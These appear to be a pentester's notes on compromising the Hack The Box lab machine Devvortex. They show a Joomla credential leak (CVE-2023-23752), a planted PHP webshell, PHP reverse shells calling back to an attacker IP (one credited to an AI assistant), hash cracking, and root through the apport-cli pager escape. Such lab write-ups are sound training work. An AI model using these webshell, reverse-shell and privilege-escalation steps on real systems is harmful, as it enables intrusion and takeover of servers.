# Lessons Learned - xxx --- # After-Action Attack Sequence - BLUF: xxx - xxx --- # Discover Ports & Services - `ping` test ![[images/Pasted image 20260711145633.png]] - `nmap` scan - light![[images/Pasted image 20260711145850.png]] - `nmap` scan - detailed![[images/Pasted image 20260711145906.png]] - `nmap` UDP scan ![[images/Pasted image 20260711150135.png]] --- # Port 80 (HTTP): nginx ver. 1.18.0 ## Initial enum - visit page ![[images/Pasted image 20260711150256.png]] - requst:response in burp![[images/Pasted image 20260711150303.png]] - `robots.txt` > 404 - `sitemap.xml` > 404 - `index.html` > everything looks to be static html ![[images/Pasted image 20260711150615.png]] - `index.php` > 404 - rando page > 404 - `whatweb` scan ![[images/Pasted image 20260711150743.png]] - `nuclei` scan ![[images/Pasted image 20260711151057.png]] ## Fuzzing - directory ![[images/Pasted image 20260711151408.png]] - with extensions ![[images/Pasted image 20260711151708.png]] - subdomain - vhost ![[images/Pasted image 20260711152014.png]] ## `dev.devvortex.htb` - visit page ![[images/Pasted image 20260711152320.png]] - everything is static here, too - run a Google image lookup on the favicon > `Bootstrap` logo - headers ```bash curl -I http://dev.devvortex.htb ``` ![[images/Pasted image 20260711152527.png]] - methods ```bash curl -X OPTIONS -i http://dev.devvortex.htb ``` ![[images/Pasted image 20260711152607.png]] - `nuclei` scan ![[images/Pasted image 20260711153257.png]] - uncovered an API endpoint that is susceptible to `CVE-2023-23752` ![[images/Pasted image 20260711153316.png]] - visiting this API endpoint leaks creds for `Lewis` ![[images/Pasted image 20260711153520.png]] - fuzzing - directory ![[images/Pasted image 20260711162812.png]] - `feroxbuster` > overload of output ```bash feroxbuster -u http://dev.devvortex.htb ``` ![[images/Pasted image 20260711154115.png]] ## `dev.devvortex.htb/administrator` - visit page ![[images/Pasted image 20260711153738.png]] - using the leaked creds we are into the Joomla dashboard - Joomla ver. 4.2.6 - users ![[images/Pasted image 20260711154549.png]] - edit `cassiopeia` template for `error.php` with a simple php webshell and save ```php system($_GET['cmd']); ``` ![[images/Pasted image 20260711154851.png]] - try to hit `error.php` ```bash curl -s http://dev.devvortex.htb/templates/cassiopeia/error.php?cmd=id ``` - didn't work and also didn't seem to save - try `offline.php` - now we have RCE ![[images/Pasted image 20260711155208.png]] - `/etc/passwd` ![[images/Pasted image 20260711161127.png]] - only `logan` and `root` have login shells - only `logan` has a home dir ![[images/Pasted image 20260711161213.png]] - throw this php revshell into `offline.php` ```php php -r '$sock=fsockopen("10.10.14.173",9001);system("sh <&3 >&3 2>&3");' ``` ![[images/Pasted image 20260711155346.png]] - try switching out `system` for `exec`, `shell_exec`, `proc_open`, `passthru`, `popen` > none work - try without the `php -r` ![[images/Pasted image 20260711164838.png]] - we are getting a call back on listener but it immediately closes ![[images/Pasted image 20260711164843.png]] - Gemini helped here with the below php revshell ```php $sock = fsockopen("10.10.14.173", 9001); $descriptorspec = array( 0 => $sock, // stdin is socket 1 => $sock, // stdout is socket 2 => $sock // stderr is socket ); $process = proc_open('/bin/sh -i', $descriptorspec, $pipes); proc_close($process); ``` --- # Shell as `www-data` > foothold - We are now on the box ![[images/Pasted image 20260711165301.png]] - check open ports ![[images/Pasted image 20260711165510.png]] - try to access db ```bash mysql -u lewis -p ``` - we are in the db ![[images/Pasted image 20260711193834.png]] - we have `$2y
hashes for `lewis` and `logan` ![[images/Pasted image 20260711194157.png]] - this is bcrypt - crack with `hashcat` ```bash hashcat -m 3200 logan.hash /opt/rockyou.txt ``` ![[images/Pasted image 20260711194635.png]] --- # Shell as `logan` ## Initial Enum - we have a lead on `/usr/bin/apport-cli` ![[images/Pasted image 20260711194743.png]] --- # Privesc - Try the below ```bash sudo /usr/bin/apport-cli ``` - No crash reports? ![[images/Pasted image 20260711194931.png]] - logs in `/var/crash` - let's create a crash report ```bash sleep 100 & kill -11 2831 ``` - hmm we have a crash report in `/var/crash` but nothing happened ![[images/Pasted image 20260711195245.png]] - Hmmmm - Googling `sudo /usr/bin/apport-cli privesc` shows `CVE-2023-1326` - See [GitHub - diego-tella/CVE-2023-1326-PoC: A proof of concept for CVE-2023–1326 in apport-cli 2.26.0 · GitHub](https://github.com/diego-tella/CVE-2023-1326-PoC) ```bash sudo /usr/bin/apport-cli -c /var/crash/_usr_bin_sleep.1000.crash #press V : !/bin/bash ``` - Rooted! ![[images/Pasted image 20260711200001.png]]